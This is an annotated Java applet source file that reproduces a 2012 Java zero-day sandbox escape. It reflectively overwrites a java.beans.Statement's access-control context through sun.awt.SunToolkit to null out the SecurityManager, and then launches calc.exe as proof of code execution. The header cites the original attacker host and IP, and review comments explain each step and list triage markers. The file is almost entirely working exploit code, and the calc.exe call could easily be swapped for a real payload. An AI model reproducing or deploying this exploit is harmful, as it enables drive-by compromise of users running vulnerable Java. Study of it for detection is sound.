  1. //
  2. // CVE-2012-XXXX Java 0day
  3. //
  4. // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
  5. //
  6. // secret host / ip : ok.aa24.net / 59.120.154.62
  7. //
  8. // regurgitated by jduck
  9. //
  10. // probably a metasploit module soon...
  11. //
  12. package cve2012xxxx;
  13.  
  14. import java.applet.Applet;
  15. import java.awt.Graphics;
  16. import java.beans.Expression;
  17. import java.beans.Statement;
  18. import java.lang.reflect.Field;
  19. import java.net.URL;
  20. import java.security.*;
  21. import java.security.cert.Certificate;
  22.  
  23. public class Gondvv extends Applet
  24. {
          // Proof-of-concept applet for the sandbox escape named in the file header.
          // Visible flow: init() calls disableSecurity(), which invokes
          // System.setSecurityManager(null) through a java.beans.Statement whose "acc"
          // field has first been overwritten with an AllPermission AccessControlContext.
          // init() then starts calc.exe, apparently as a marker that code ran
          // outside the applet sandbox.
          //
          // For triage: the string constants "sun.awt.SunToolkit", "getField",
          // "setSecurityManager" and "acc" appearing together in one applet class are
          // the static markers this listing offers, and a calc.exe child process
          // is the only runtime effect it shows.
  25.  
          // No-op constructor.
  26.     public Gondvv()
  27.     {
  28.     }
  29.  
          // Replaces the JVM-wide SecurityManager with null.
          //
          // The Statement targets System.setSecurityManager with a one-element argument
          // array that is never filled, so the single argument is null. Before execute(),
          // the Statement's "acc" field is swapped for a context built from one
          // ProtectionDomain granting AllPermission (code source file:///, empty
          // certificate array). Presumably execute() evaluates the call under that
          // stored context, which is why the swap has to come first -- verify against
          // the java.beans.Statement source of the JDK under test.
          //
          // Throws: whatever the reflective helpers or execute() raise.
  30.     public void disableSecurity()
  31.         throws Throwable
  32.     {
  33.         Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
  34.         Permissions localPermissions = new Permissions();
  35.         localPermissions.add(new AllPermission());
  36.         ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
  37.         AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
  38.             localProtectionDomain
  39.         });
              // Overwrite the Statement's stored context with the all-permission one.
  40.         SetField(Statement.class, "acc", localStatement, localAccessControlContext);
  41.         localStatement.execute();
  42.     }
  43.  
          // Looks up a class by name through a java.beans.Expression that invokes
          // Class.forName(paramString), instead of calling Class.forName directly.
          // The only caller in this listing passes "sun.awt.SunToolkit".
          // NOTE(review): the indirection presumably changes which caller the
          // package-access check sees; confirm against the JDK build being analysed.
  44.     private Class GetClass(String paramString)
  45.         throws Throwable
  46.     {
  47.         Object arrayOfObject[] = new Object[1];
  48.         arrayOfObject[0] = paramString;
  49.         Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
  50.         localExpression.execute();
  51.         return (Class)localExpression.getValue();
  52.     }
  53.  
          // Writes paramObject2 into the field named paramString (looked up on
          // paramClass) of the instance paramObject1.
          //
          // The Field comes from invoking getField(paramClass, paramString) on
          // sun.awt.SunToolkit through an Expression and is set() directly; there is no
          // setAccessible call here, so presumably the helper returns a Field that is
          // already accessible -- verify against the JDK source.
  54.     private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
  55.         throws Throwable
  56.     {
  57.         Object arrayOfObject[] = new Object[2];
  58.         arrayOfObject[0] = paramClass;
  59.         arrayOfObject[1] = paramString;
  60.         Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
  61.         localExpression.execute();
  62.         ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
  63.     }
  64.  
          // Applet entry point: calls disableSecurity(), then launches calc.exe and
          // waits for it to exit. Any Throwable is only printed to the stack trace.
  65.     public void init()
  66.     {
  67.         try
  68.         {
  69.             disableSecurity();
  70.             Process localProcess = null;
  71.             localProcess = Runtime.getRuntime().exec("calc.exe");
                  // NOTE(review): the trailing ';' makes this 'if' an empty statement,
                  // so the waitFor() on the next line runs unconditionally.
  72.             if(localProcess != null);
  73.                localProcess.waitFor();
  74.         }
  75.         catch(Throwable localThrowable)
  76.         {
  77.             localThrowable.printStackTrace();
  78.         }
  79.     }
  80.  
          // Draws the fixed text "Loading" at (50, 25); it does nothing else.
  81.     public void paint(Graphics paramGraphics)
  82.     {
  83.         paramGraphics.drawString("Loading", 50, 25);
  84.     }
  85. }